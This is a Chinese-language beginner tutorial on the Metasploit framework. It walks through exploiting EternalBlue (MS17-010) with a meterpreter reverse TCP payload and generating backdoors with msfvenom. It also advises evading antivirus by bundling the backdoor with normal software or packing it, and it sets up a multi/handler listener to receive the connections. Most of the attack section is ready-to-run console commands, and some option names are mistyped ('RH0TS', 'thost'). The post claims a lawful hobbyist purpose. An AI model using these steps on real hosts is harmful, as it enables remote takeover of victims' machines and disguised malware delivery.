【网络安全】-入门版

secure

• 一、基本工具
• • 1、metasploit framework

    ps.本着兴趣爱好，加强电脑的安全防护能力，并严格遵守法律和道德规范。
    

    一、基本工具

    1、metasploit framework

    msf（metasploit framework）是一个开源的渗透测试框架，用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具、漏洞利用模块和负载模块，可以用于发现系统中的漏洞、测试系统的安全性，并进行攻击和漏洞利用。它支持多种操作系统，包括Windows、Linux和Mac OS X。

    msf使用法则：使用模块->配置模块必选项->运行模块

    msfconsole		//进入msf控制台，以使用模块（推荐root权限）
    >>>进入msf
    //1、使用模块
    search 关键词	//搜索模块
    use 模块编号/绝对路径	//使用模块
    >>>进入模块
    //2、配置模块必选项
    show options	//显示配置选项
    set 选项名称 值
    //3、运行模块
    run
    

    举例：metasploit攻击永恒之蓝（后门）

    1、有此漏洞的目标主机

    //1、使用模块
    use exploit/windows/smb/ms17_010_eternalblue
    //2、设置必选项
    //查看必选项[*required为yes的就是必选项]
    show options
    set RH0TS 192.168.1.128	//[RHOSTS:为target host(s)代表你要攻击谁]
    set payload windows/x64/meterpreter/reverse_tcp	//[payload,是攻击载荷，就是攻击完成后想干啥，这里是想获取meterpreter][meterpreter相当于内部策反的间谍，提供远程控制功能。]
    set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁，既Kali的IP地址]
    set LPORT 12345	//[LPORT:为listen port,代表你要在kali上开启的端口，1-65535随便选，但不能被占用]
    3、运行
    run
    4、进入目标主机
    >>>meterpreter
    help	//从帮助里看看能对目标主机干什么
    

    2、无此漏洞的目标主机（常用）

    没有漏洞就得拍个间谍过去，把后门打开。

    2.1 目标主机的间谍软件：msfvenom是用来生成后门的软件，在目标机上执行后门，在本地监听上线，更容易策反meterpreter，图中是windows，此外，还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用，不是msfconsoles终端]

    

    避开杀毒软件

    方法一：和正常软件捆绑

    

    方法二：给辅助软件加壳

    自行寻找

    2.2 本地主机的接应程序：

    use exploit/multi/handler	//攻击多目标载荷模块
    set payload windows/x64/meterpreter/reverse_tcp//设置载荷
    set thost 192.168.1.136
    set lport 9999
    run